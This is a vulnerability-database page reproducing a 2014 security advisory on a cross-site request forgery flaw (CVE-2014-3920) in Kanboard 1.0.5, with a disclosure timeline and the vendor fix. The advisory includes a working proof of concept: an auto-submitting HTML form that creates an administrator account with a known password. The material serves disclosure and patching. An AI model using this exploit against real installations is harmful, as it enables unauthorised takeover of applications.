Vulners
Lucene search
Kanboard 1.0.5 Cross Site Request Forgery Vulnerability
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2014-3920 | 3 Jul 201414:00 | – | cve |
 | CVE-2014-3920 | 3 Jul 201414:00 | – | cvelist |
 | CVE-2014-3920 | 3 Jul 201414:00 | – | debiancve |
 | EUVD-2014-3857 | 7 Oct 202500:30 | – | euvd |
 | Cross-Site Request Forgery (CSRF) in Kanboard | 28 May 201400:00 | – | htbridge |
 | CVE-2014-3920 | 3 Jul 201414:55 | – | nvd |
 | Kanboard < 1.0.6 CSRF Vulnerability | 4 Dec 201500:00 | – | openvas |
 | Kanboard 1.0.5 Cross Site Request Forgery | 2 Jul 201400:00 | – | packetstorm |
 | Cross site request forgery (csrf) | 3 Jul 201414:55 | – | prion |
 | Cross-Site Request Forgery (CSRF) in Kanboard | 15 Oct 201400:00 | – | securityvulns |
10
Product: Kanboard
Vendor: http://kanboard.net/
Vulnerable Version(s): 1.0.5 and probably prior
Tested Version: 1.0.5
Advisory Publication: May 28, 2014 [without technical details]
Vendor Notification: May 28, 2014
Vendor Patch: June 30, 2014
Public Disclosure: July 2, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-3920
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in Kanboard, which can be exploited to perform Сross-Site Request Forgery (CSRF) attacks and gain complete control over the vulnerable application.
1. Сross-Site Request Forgery (CSRF) in Kanboard: CVE-2014-3920
The vulnerability exists due to insufficient verification of the HTTP request origin. A remote attacker can trick a logged-in administrator of Kanboard to visit a specially crafted web page with CSRF exploit code and create new account with administrative privileges.
Simple CSRF exploit below creates new admin account with login "immuniweb" and password "password":
<form action="http://kanboard/?controller=user&action=save" method="post" name="main">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="name" value="name">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="password" value="password">
<input type="hidden" name="confirmation" value="password">
<input type="hidden" name="default_project_id" value="0">
<input type="hidden" name="is_admin" value="1">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Kanboard 1.0.6
More Information:
http://kanboard.net/news
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jul 2014 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00132